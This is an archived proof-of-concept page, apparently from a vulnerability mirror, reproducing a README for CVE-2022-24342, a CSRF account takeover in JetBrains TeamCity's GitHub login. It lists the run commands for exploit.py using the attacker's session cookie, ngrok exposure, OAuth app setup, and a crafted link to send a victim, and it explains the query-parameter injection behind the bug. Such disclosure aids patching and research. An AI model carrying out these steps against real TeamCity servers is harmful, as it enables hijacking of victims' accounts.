Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-24342 PoC — JetBrains TeamCity 跨站请求伪造漏洞

Source
https://github.com/yuriisanin/CVE-2022-24342
Associated Vulnerability
Title:JetBrains TeamCity 跨站请求伪造漏洞 (CVE-2022-24342)
Description:Jetbrains JetBrains TeamCity是捷克JetBrains(Jetbrains)公司的一套分布式构建管理和持续集成工具。该工具提供持续单元测试、代码质量分析和构建问题分析报告等功能。 JetBrains TeamCity 中存在跨站请求伪造漏洞,该漏洞源于产品未对URL中的特殊字符进行充分检查。攻击者可通过该漏洞导致注入。以下产品及版本受到影响:JetBrains TeamCity 2021.2.1 之前版本。
Description
PoC for CVE-2022-24342: account takeover via CSRF in GitHub authentication
Readme
# CVE-2022-24342
JetBrains TeamCity - account takeover via CSRF in GitHub authentication (PoC)

<!-- TOC -->

- [CVE-2022-24342](#cve-2022-24342)
  - [Requirements](#requirements)
  - [Usage](#usage)
  - [How does it work?](#how-does-it-work)
    - [GitHub OAuth2: query parameters processing order](#github-oauth2-query-parameters-processing-order)
    - [CVE-2022-24342: HTTP requests flow](#cve-2022-24342-http-requests-flow)

<!-- /TOC -->

## Requirements

- JetBrains TeamCity <2021.2.1
- GitHub authentication enabled

## Usage

1.  Try to login with attacker's GitHub account into target TeamCity intance to make TeamCity's GitHub application authorized.

2. Install & run:
```powershell
$ git clone https://github.com/yuriisanin/CVE-2022-24342
$ cd CVE-2022-24342/
$ pip3 install -r requirements.txt
$ python3 exploit.py -h

usage: exploit.py [-h] -s S [-p P]

optional arguments:
  -h, --help  show this help message and exit
  -s S        GitHub user session
  -p P        Uvicorn port

$ python3 exploit.py -s {attackers_github_session_cookie}
```

> If you run the exploit on the local machine, you might need to use Ngrok or alternatives.

``` powershell
$ ngrok http 8000
```

2. Create GitHub OAuth2 application:

```
homepage: "http://{exploit-host}:8000"
authorization callback url: "http://{exploit-host}:8000/callback"
```

3. Send the following link to a victim:

```
http://{exploit-host}:8000/exploit?target_host=http://{target-host}&gh_client_id={github_oauth_client_id}
```

**DEMO:**

[![CVE-2022-24342 Demo](https://img.youtube.com/vi/Xq3nanpOquo/0.jpg)](https://www.youtube.com/watch?v=Xq3nanpOquo)

## How does it work?

TeamCity was vulnerable to query paramater injection during OAuth2 flow, allowing an attacker to redirect user into an arbitrary GitHub OAuth2 application, intercept a valid state parameter, and connect arbitrary GitHub account to victim's TeamCity account.

This was possible due to next things:

- GitHub OAuth2 query parameters processing order
- TeamCity query parameter injection

### GitHub OAuth2: query parameters processing order

![github-oauth-parameters-processing](assets/github-oauth-parameters-processing.png)

### CVE-2022-24342: HTTP requests flow

![requests-flow](assets/requests-flow.png)

## Support

You can follow me on [Twitter](https://twitter.com/SaninYurii), [GitHub](https://github.com/yuriisanin) or [YouTube](https://www.youtube.com/channel/UCLN2EvGxtnucEdrI21PmJZg).
File Snapshot

 [4.0K]  /data/pocs/926cc66d61674e8e21693c0d48956f40ae3838b7
├── [4.0K]  assets
│   ├── [159K]  github-oauth-parameters-processing.png
│   └── [236K]  requests-flow.png
├── [6.5K]  exploit.py
├── [2.4K]  README.md
└── [  34]  requirements.txt

1 directory, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.